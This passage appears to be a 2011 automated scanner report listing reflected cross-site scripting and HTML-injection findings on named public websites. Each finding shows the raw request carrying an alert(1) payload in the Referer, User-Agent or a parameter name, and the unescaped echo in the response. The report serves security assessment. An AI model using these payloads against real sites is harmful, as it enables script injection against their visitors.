The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 74e06"-alert(1)-"034d1bf96e0 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.seniorfriendfinder.com
Accept: */*
Proxy-Connection: Keep-Alive
Referer: http://www.google.com/search?hl=en&q=74e06"-alert(1)-"034d1bf96e0

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 15:42:09 GMT
Server: Apache
Set-Cookie: ffsenior_who=r,eFlDGDO3M/B8uQe6Tg/nMsOSx6qtGBOwtcB8g2AExvU1kH6cO6Jx51xFYNU5dIBZkdiffrYuj1Oahmzx3dy99fALPxXbF8xODouKN4/UODD0qVEPN4NonaUhB_zFVl8F; path=/; domain=.seniorfriendfinder.com
Set-Cookie: v_hash=_english_0; path=/; domain=.seniorfriendfinder.com; expires=Mon, 02-May-2011 15:42:10 GMT
Set-Cookie: IP_COUNTRY=United States; path=/; domain=.seniorfriendfinder.com; expires=Mon, 02-May-2011 15:42:10 GMT
Set-Cookie: ffsenior_tr=r,zbFlvH5I3Fv_0I5CZBaazJ5MPIbEorHO48pBNjFK0M5kvrgFhWoWRo1KjFk_7iMG; path=/; domain=.seniorfriendfinder.com; expires=Mon, 02-May-2011 15:42:10 GMT
Set-Cookie: LOCATION_FROM_IP=connection&tx&ip_type&Mapped&lat&38.9069&country_code&US&asn&36351&state&District+of+Columbia&carrier&softlayer+technologies+inc.&ip_routing_type&fixed&city&Washington&state_cf&95&country_code_cf&99&postal_code&20026&latitude&38.9069&second_level_domain&softlayer&country&United+States&area_code&202&country_name&United+States&longitude&-77.0284&line_speed&high&timezone&-5.0&aol&0&region&mid+atlantic&top_level_domain&com&city_cf&80&pmsa&8840&msa&47900&zip&20026&continent&north+america&lon&-77.0284&dma_code&511; path=/; domain=.seniorfriendfinder.com; expires=Mon, 02-May-2011 15:42:10 GMT
Set-Cookie: HISTORY=20110402-2-Dc1; path=/; domain=.seniorfriendfinder.com; expires=Mon, 02-May-2011 15:42:10 GMT
Set-Cookie: REFERRAL_URL=http://www.google.com/search?hl=en&q=74e06"-alert(1)-"034d1bf96e0; path=/; domain=.seniorfriendfinder.com; expires=Sun, 03-Apr-2011 03:42:10 GMT
Set-Cookie: click_id_time=161909672_2011-04-02 08:42:10; path=/; domain=.seniorfriendfinder.com; expires=Mon, 02-May-2011 15:42:10 GMT
ETag: TESTBED
P3P: CP="DSP LAW"
X-ApacheServer: ii17-26.friendfinderinc.com
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 45731

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="canonical" href=
...[SNIP]...
<fid:OD9 1301758908 173.193.214.243 ");var pageName=escape(location.pathname);var referer="http://www.google.com/search?hl=en&q=74e06"-alert(1)-"034d1bf96e0";var refererPageName=getRefererPageName(referer);var screenResolution=screen.width+"x"+screen.height;var glean=new Image();var ffProto=("https:"==document.location.protocol)?"https://":"http://";var r
...[SNIP]...

2.91. http://www.stvid.com/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.stvid.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 83eff'-alert(1)-'f714e089ce6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.stvid.com
Accept: */*
Proxy-Connection: Keep-Alive
Referer: 83eff'-alert(1)-'f714e089ce6

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 15:03:07 GMT
Server: Apache/2.2.11 (Unix) PHP/5.2.8
X-Powered-By: PHP/5.2.8
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat, 02 Apr 2011 15:03:07GMT
Set-Cookie: last_from=good; expires=Sun, 03-Apr-2011 15:03:07 GMT; path=/
Vary: User-Agent,Accept-Encoding
Content-Type: text/html
Content-Length: 193416

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
<head>
<script type="text/javasc
...[SNIP]...
<!--
document.cookie='atref=83eff'-alert(1)-'f714e089ce6$#; path=/;'
// -->
...[SNIP]...

2.92. http://www.tiffany.com/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tiffany.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ef66e'-alert(1)-'370dc472c34 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tiffany.com
Accept: */*
Proxy-Connection: Keep-Alive
Referer: http://www.google.com/search?hl=en&q=ef66e'-alert(1)-'370dc472c34

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 101486
Date: Sat, 02 Apr 2011 15:26:51 GMT
Connection: close
Set-Cookie: rtbresponsedata=; expires=Sat, 02-Apr-2011 15:56:51 GMT; path=/
Set-Cookie: samebrowsersession=; path=/
Set-Cookie: assortmentid=101; expires=Mon, 18-Jan-2038 05:00:00 GMT; path=/
Set-Cookie: hascookies1=1; expires=Fri, 01-Jan-2038 05:00:00 GMT; path=/
Set-Cookie: previoussid=; path=/
Set-Cookie: hascookies1=1; expires=Wed, 02-Apr-2031 15:26:51 GMT; path=/
Set-Cookie: hascookies1=1; expires=Wed, 02-Apr-2031 15:26:51 GMT; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
if redirection to international page is needed. If needed, return the URL
        var redirectToInternationalPageURL = '/International.aspx?origref=http%3a%2f%2fwww.google.com%2fsearch%3fhl%3den%26q%3def66e'-alert(1)-'370dc472c34';

        //Redirect users to International.aspx, that don't have a cookie set and
        //don't have Site id passed in the query string and the request came to tiffany.com.
        if((redirectToIn
...[SNIP]...

2.93. http://www.toonfanclub.com/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.toonfanclub.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ba0a"><script>alert(1)</script>ab38a3dd817 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.toonfanclub.com
Accept: */*
Proxy-Connection: Keep-Alive
Referer: http://www.google.com/search?hl=en&q=7ba0a"><script>alert(1)</script>ab38a3dd817

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 02 Apr 2011 15:45:18 GMT
Content-Type: text/html; charset=windows-1251
Connection: keep-alive
X-Powered-By: PHP/5.2.14
Set-Cookie: stat_0=1301759118; expires=Sat, 02-Apr-2011 16:15:18 GMT
Content-Length: 18964

<html>
<head>

<script language="javascript" src="warning-images/jquery-1.4.2.min.js"></script>
<script language="javascript" src="warning-images/jquery.cookie.js"></script>

<title>Toon Fan Club</tit
...[SNIP]...
<a href="join.php?id=0&ref=http://www.google.com/search?hl=en&q=7ba0a"><script>alert(1)</script>ab38a3dd817">
...[SNIP]...

2.94. http://www.tubethumbs.com/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tubethumbs.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a4112'-alert(1)-'e51c450e111 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tubethumbs.com
Accept: */*
Proxy-Connection: Keep-Alive
Referer: a4112'-alert(1)-'e51c450e111

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 15:20:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Content-Type: text/html
Content-Length: 250007

<script type="text/javascript">
<!--
document.cookie='atref=a4112'-alert(1)-'e51c450e111$#; path=/;'
// -->
</script>


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w
...[SNIP]...

2.95. http://www.usedcars.com/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.usedcars.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2deb6</script><script>alert(1)</script>4c5b8a89a54 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.usedcars.com
Accept: */*
Proxy-Connection: Keep-Alive
Referer: http://www.google.com/search?hl=en&q=2deb6</script><script>alert(1)</script>4c5b8a89a54

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 15:34:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 79412


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Used Cars
...[SNIP]...
tLogObj.WEB_LOG_qs = '';
webAndEventLogObj.WEB_LOG_ra5 = 'C1_0309';
webAndEventLogObj.WEB_LOG_referrer_number = '29386';
webAndEventLogObj.WEB_LOG_referrer_page = 'http://www.google.com/search?hl=en&q=2deb6</script><script>alert(1)</script>4c5b8a89a54';
webAndEventLogObj.WEB_LOG_remote_ip = '173.193.214.243';
webAndEventLogObj.WEB_LOG_site_name = 'UsedCars.com';
webAndEventLogObj.WEB_LOG_user_number = '3ddda0cf-625a-4d6d-81a9-9e26018fb54b';
webAndE
...[SNIP]...

2.96. http://www.usedcars.com/ [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.usedcars.com
Path:   /

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bf9d9'-alert(1)-'1f68a952df2 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3bf9d9'-alert(1)-'1f68a952df2
Host: www.usedcars.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 15:34:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 79307


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Used Cars
...[SNIP]...
="text/javascript" language="javascript">
var webAndEventLogObj = new logJSWebPageViewEvent();
webAndEventLogObj.WEB_LOG_browser = 'curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3bf9d9'-alert(1)-'1f68a952df2';
webAndEventLogObj.WEB_LOG_server_number = '24';
webAndEventLogObj.WEB_LOG_detail_number = '60000';
webAndEventLogObj.WEB_LOG_qs = '';
webAndEventLogObj.WEB_LOG_ra5 = 'C1_0309';
webAndEventLogObj.WEB
...[SNIP]...

2.97. http://www.vulvatube.com/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vulvatube.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload de661'-alert(1)-'1cd2301d5dc was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.vulvatube.com
Accept: */*
Proxy-Connection: Keep-Alive
Referer: de661'-alert(1)-'1cd2301d5dc

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 15:45:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Content-Type: text/html
Content-Length: 155479

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<!--
document.cookie='atref=de661'-alert(1)-'1cd2301d5dc$$; path=/;'
// -->
...[SNIP]...

2.98. http://www.workathomepositionplacement.com/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.workathomepositionplacement.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55a9a"><script>alert(1)</script>d2e55111866 was submitted in the Referer HTTP header. This input was echoed as 55a9a\"><script>alert(1)</script>d2e55111866 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.workathomepositionplacement.com
Accept: */*
Proxy-Connection: Keep-Alive
Referer: http://www.google.com/search?hl=en&q=55a9a"><script>alert(1)</script>d2e55111866

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 16:10:05 GMT
Server: Apache/2.2
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
X-Pingback: http://www.workathomepositionplacement.com/xmlrpc.php
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Length: 8886


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head prof
...[SNIP]...
<a href="http://www.clickbooth.com" title="Affiliates" target="_blank" onclick="urchinTracker('/outgoing/www.clickbooth.com?referer=http://www.google.com/search?hl=en&q=55a9a\"><script>alert(1)</script>d2e55111866');">
...[SNIP]...

2.99. http://www.8tracks.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.8tracks.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b2d0a<script>alert(1)</script>b7a0edcfda0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /?b2d0a<script>alert(1)</script>b7a0edcfda0=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.8tracks.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Content-Type: application/octet-stream
Connection: close
Status: 301
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
Location: http://8tracks.com/?b2d0a<script>alert(1)</script>b7a0edcfda0=1
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)
Content-Length: 156

Redirecting to <a href="http://8tracks.com/?b2d0a<script>alert(1)</script>b7a0edcfda0=1">http://8tracks.com/?b2d0a<script>alert(1)</script>b7a0edcfda0=1</a>

2.100. http://www.8tracks.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.8tracks.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 539e3"><script>alert(1)</script>637fde56121 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /?539e3"><script>alert(1)</script>637fde56121=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.8tracks.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Content-Type: application/octet-stream
Connection: close
Status: 301
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
Location: http://8tracks.com/?539e3"><script>alert(1)</script>637fde56121=1
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)
Content-Length: 160

Redirecting to <a href="http://8tracks.com/?539e3"><script>alert(1)</script>637fde56121=1">http://8tracks.com/?539e3"><script>alert(1)</script>637fde56121=1</a>

2.101. http://www.alamo.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.alamo.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as text between TITLE tags. The payload 828c9</title><a>03c6aeed4e1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /?828c9</title><a>03c6aeed4e1=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.alamo.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Moved Temporarily
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: https://www.alamo.com/?828c9</title><a>03c6aeed4e1=1
Content-Type: text/html
Set-Cookie: JSESSIONID=0aa0fd4630df90160eb0b43d4625a13894300d081a62.e34Pah8QaNaPbO0LaheQbxaKb3yRe0; path=/; secure
Server: Oracle-Application-Server-10g/10.1.3.1.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.3.0 (N;ecid=72058957102419330,0)
Content-Length: 237
Date: Sat, 02 Apr 2011 15:18:59 GMT

<HTML><HEAD><TITLE>Redirect to https://www.alamo.com/?828c9</title><a>03c6aeed4e1=1</TITLE></HEAD><BODY><A HREF="https://www.alamo.com/?828c9</title><a>03c6aeed4e1=1">https://www.alamo.com/?828c9</tit
...[SNIP]...

2.102. http://www.alamo.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.alamo.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bfa32"><a>b27a94bfd2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /?bfa32"><a>b27a94bfd2=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.alamo.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Moved Temporarily
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: https://www.alamo.com/?bfa32"><a>b27a94bfd2=1
Content-Type: text/html
Set-Cookie: JSESSIONID=0aa0fd4730dfe6c15252738b4906b9668a637fa1d1e0.e34PahePchyQbi0Lb3yNaN4NahyPe0; path=/; secure
Server: Oracle-Application-Server-10g/10.1.3.1.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.3.0 (N;ecid=72058480361014371,0)
Content-Length: 216
Date: Sat, 02 Apr 2011 15:18:25 GMT

<HTML><HEAD><TITLE>Redirect to https://www.alamo.com/?bfa32"><a>b27a94bfd2=1</TITLE></HEAD><BODY><A HREF="https://www.alamo.com/?bfa32"><a>b27a94bfd2=1">https://www.alamo.com/?bfa32"><a>b27a94bfd2=1</
...[SNIP]...

2.103. http://www.alamo.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.alamo.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 333d9<a>d9aa5621cfd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /?333d9<a>d9aa5621cfd=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.alamo.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Moved Temporarily
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: https://www.alamo.com/?333d9<a>d9aa5621cfd=1
Content-Type: text/html
Set-Cookie: JSESSIONID=0aa0fd4730dfc1d2c002d8f04da591befc493a0cfe92.e34PahePchyQbi0Lb3yNaN4NahyPe0; path=/; secure
Server: Oracle-Application-Server-10g/10.1.3.1.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.3.0 (N;ecid=72058879792989786,0)
Content-Length: 213
Date: Sat, 02 Apr 2011 15:18:41 GMT

<HTML><HEAD><TITLE>Redirect to https://www.alamo.com/?333d9<a>d9aa5621cfd=1</TITLE></HEAD><BODY><A HREF="https://www.alamo.com/?333d9<a>d9aa5621cfd=1">https://www.alamo.com/?333d9<a>d9aa5621cfd=1</A><
...[SNIP]...

2.104. http://www.downloadsquad.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.downloadsquad.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2265"><script>alert(1)</script>c1f93e51337 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /?a2265"><script>alert(1)</script>c1f93e51337=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.downloadsquad.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 02 Apr 2011 16:11:43 GMT
Server: ArtBlast/3.5.5
MIME-Version: 1.0
Expires: Sat, 02 Apr 2011 16:41:43 GMT
Content-length: 146
Content-type: text/html
Location: http://downloadsquad.switched.com/?a2265"><script>alert(1)</script>c1f93e51337=1

<html>
<body>
Page relocated <a href="http://downloadsquad.switched.com/?a2265"><script>alert(1)</script>c1f93e51337=1">here.</a>
</body>
</html>

2.105. http://www.force.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.force.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c4454<script>alert(1)</script>825772b2f33 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

